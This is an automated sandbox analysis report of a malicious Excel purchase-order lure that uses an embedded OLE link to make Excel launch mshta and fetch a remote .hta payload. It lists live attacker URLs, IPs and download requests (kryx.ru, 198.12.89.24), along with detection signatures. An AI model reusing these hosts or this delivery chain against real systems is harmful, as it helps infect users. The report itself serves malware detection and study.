Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#4500550389.xla.xlsx

Overview

General Information

Sample name:PO#4500550389.xla.xlsx
Analysis ID:1640396
MD5:9395f29bf9aa98cdfc7be58656b0c436
SHA1:bb011d3f299d379fe2e55fb9afc34ed29b89f484
SHA256:45971f014df6d607611e96131089cf154c8842aa2154bd8382badf844dbe96b1
Tags:xlsxuser-lowmal3
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 5228 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 7808 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 7940 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 2240 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 5228, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7808, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.225.72.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5228, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 55218
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 55218, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 5228, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 29%Perma Link
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 22%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.24:55224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.24:55223 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: kryx.ru
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55215 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:55215
Source: global trafficTCP traffic: 192.168.2.24:55215 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:55215
Source: global trafficTCP traffic: 192.168.2.24:55215 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:55215
Source: global trafficTCP traffic: 192.168.2.24:55215 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:55218 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:55218
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 192.168.2.24:55224 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55224
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55223 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.24:55223
Source: global trafficTCP traffic: 192.168.2.24:55219 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:55219
Source: global trafficTCP traffic: 192.168.2.24:55215 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 13.107.253.72 13.107.253.72
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&support HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&support HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule120201v19s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PO#4500550389.xla.xlsx, 55850000.0.drString found in binary or memory: https://kryx.ru/e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&support
Source: Primary1742200919595002900_E2A30740-38D4-4D8E-A2A2-5B97A97B55BB.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55223
Source: unknownNetwork traffic detected: HTTP traffic on port 55224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55224
Source: unknownNetwork traffic detected: HTTP traffic on port 55223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 443
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.24:55224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.24:55223 version: TLS 1.2

System Summary

barindex
Source: PO#4500550389.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DF53F06DAF83250DEA.TMP.0.drOLE: Microsoft Excel 2007+
Source: 55850000.0.drOLE: Microsoft Excel 2007+
Source: PO#4500550389.xla.xlsxStream path 'MBD00D3132F/\x1Ole' : https://kryx.ru/e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&supportvNsVhn&2 s=TEQ\'i hx5r,Fu3ao;5&\75jj(]Bf_JJkU4xr<7ajo'"Q"}E\Rw@& [15`_'F^&N_MhJGdmePbS1CxHyFDkGE3fHPBLNAt3FUTULpSnGri9JqlALqNoOCwgfWGMy4r72ELvF2AddO76oxSNgTOxjNTv58uWMeJytEREIrBsAAaXhxczALJMbnYCyofQGozNieyXsLzXM9LR5IqOQTWK1dBZ2kaY1hLTbJb4nr815yAsjhkXIS7mvGJiMu6Otc9s5bgh2mx3UqNcE3vfmadmxGzR{bXo7fkmUSVb&
Source: 55850000.0.drStream path 'MBD00D3132F/\x1Ole' : https://kryx.ru/e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&supportvNsVhn&2 s=TEQ\'i hx5r,Fu3ao;5&\75jj(]Bf_JJkU4xr<7ajo'"Q"}E\Rw@& [15`_'F^&N_MhJGdmePbS1CxHyFDkGE3fHPBLNAt3FUTULpSnGri9JqlALqNoOCwgfWGMy4r72ELvF2AddO76oxSNgTOxjNTv58uWMeJytEREIrBsAAaXhxczALJMbnYCyofQGozNieyXsLzXM9LR5IqOQTWK1dBZ2kaY1hLTbJb4nr815yAsjhkXIS7mvGJiMu6Otc9s5bgh2mx3UqNcE3vfmadmxGzR{bXo7fkmUSVb&
Source: ~DF53F06DAF83250DEA.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'po#4500550389.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/14@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO#4500550389.xla.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E2A30740-38D4-4D8E-A2A2-5B97A97B55BB} - OProcSessId.datJump to behavior
Source: PO#4500550389.xla.xlsxOLE indicator, Workbook stream: true
Source: 55850000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 29%
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: PO#4500550389.xla.xlsxStatic file information: File size 1318912 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: PO#4500550389.xla.xlsxInitial sample: OLE indicators vbamacros = False
Source: PO#4500550389.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
